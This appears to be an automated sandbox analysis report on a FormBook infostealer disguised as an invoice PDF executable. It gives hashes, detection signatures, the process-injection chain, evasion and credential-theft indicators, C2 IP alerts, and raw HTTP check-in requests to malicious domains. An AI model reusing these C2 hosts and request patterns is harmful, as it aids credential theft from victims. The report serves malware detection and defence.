Windows Analysis Report
Outstanding Invoices Spreadsheet Scan 00495_PDF.exe

Overview

General Information

Sample name: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
Analysis ID: 1572490
MD5: 809f3ed91d34d38f0eced2a0709e22e9
SHA1: 08eddcdbf872273fffd90569024c74d99da2c6bd
SHA256: 494b4e888e21a6d9545fb434442900723eae53eb99882dfaa5f30367bf37d4c5
Tags: exe, user-TeamDreier
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Outstanding Invoices Spreadsheet Scan 00495_PDF.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe" MD5: 809F3ED91D34D38F0ECED2A0709E22E9)
    • svchost.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fQbMdgFgKkVEm.exe (PID: 1400 cmdline: "C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xwizard.exe (PID: 7680 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: 8581F29C5F84B72C053DBCC5372C5DB6)
          • firefox.exe (PID: 7864 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

Source: 2.2.svchost.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.svchost.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

                System Summary

Source: Process started, Author: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe" , ParentImage: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe, ParentProcessId: 1400, ParentProcessName: fQbMdgFgKkVEm.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 7680, ProcessName: xwizard.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", CommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", CommandLine|base64offset|contains: "{, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", ParentImage: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, ParentProcessId: 7328, ParentProcessName: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", ProcessId: 7388, ProcessName: svchost.exe
Source: Process started, Author: vburov: Data: Command: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", CommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", CommandLine|base64offset|contains: "{, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", ParentImage: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, ParentProcessId: 7328, ParentProcessName: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe", ProcessId: 7388, ProcessName: svchost.exe

                AV Detection

                Source: http://www.bioart.buzz/uwg4/Avira URL Cloud: Label: malware
                Source: http://www.bioart.buzz/uwg4/?UTJ0bhC=FrIvBq+7M+fO4hFqHVkj/h0MgBQBdbkSyhygt3ownjEqtb7lfSc+JwlWQ4K/WGS3VMA0fSxFYiNdEScU0GRMxZDLyu9hbg86BnUYxIHc13WjzD0wj4NYGBX3EB3iY/brcg==&Pt=fDlHoNWP0RBdAvira URL Cloud: Label: malware
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeReversingLabs: Detection: 39%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeJoe Sandbox ML: detected
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fQbMdgFgKkVEm.exe, 00000004.00000000.2274863523.000000000042E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039615159.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.0000000004070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2260658057.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258852027.0000000003300000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2355523208.0000000004D14000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.000000000505E000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2353468444.0000000004B61000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039615159.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.0000000004070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2260658057.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2353547525.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258852027.0000000003300000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000005.00000003.2355523208.0000000004D14000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.000000000505E000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2353468444.0000000004B61000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503032997.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000002.2353401714.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321941028.000000000302B000.00000004.00000020.00020000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000003.2423482550.0000000000B40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.000000000405C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000054EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2636924020.000000002FB8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.000000000405C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003216000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000054EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2636924020.000000002FB8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000002.2353401714.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321941028.000000000302B000.00000004.00000020.00020000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000003.2423482550.0000000000B40000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0301C840 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C840
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4x nop then pop edi4_2_064D8B1C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeCode function: 4x nop then xor eax, eax4_2_064DC31F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 4x nop then xor eax, eax5_2_03009E90
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 4x nop then mov ebx, 00000004h5_2_04DB04E1

                Networking

                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49816 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49816 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49839 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49833 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49808 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49757 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49757 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49878 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49884 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49872 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49802 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49894 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49894 -> 217.160.0.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49911 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49917 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49845 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49961 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49945 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49968 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50002 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50010 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49968 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 74.48.34.43:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50006 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50014 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49796 -> 180.178.39.236:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 31.31.198.145:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49955 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 45.79.252.94:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49934 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49934 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49923 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49854 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49854 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 31.31.198.145:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 45.79.252.94:80
                Source: Joe Sandbox ViewIP Address: 203.161.49.193 203.161.49.193
                Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
                Source: global trafficHTTP traffic detected: GET /q97g/?UTJ0bhC=KK21uW0xHvorSk2vqcKD6wcSSPO+hyXQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B9BwzLeItohU7wCU4mTfCSECcS++9DVG9zxqTCFVXtteVmg==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.regents.healthConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tizt/?UTJ0bhC=qmi+mqOOYFdY+IQEwG2FxqFWHTg0Nvqmcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxg8Ma1a6j66cDsm0o40uJcJz1cVDMGreiQH32Lp7znSrnRg==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.73613.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n54u/?UTJ0bhC=ulF5vHaDZay2YbeuiqBK2WYi+52Jh6JWqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2tti5seczbyW8/HcZoVhAsi6mpRcK6hsQ2VCyFx3Djg7K8V+w==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.eco-tops.websiteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
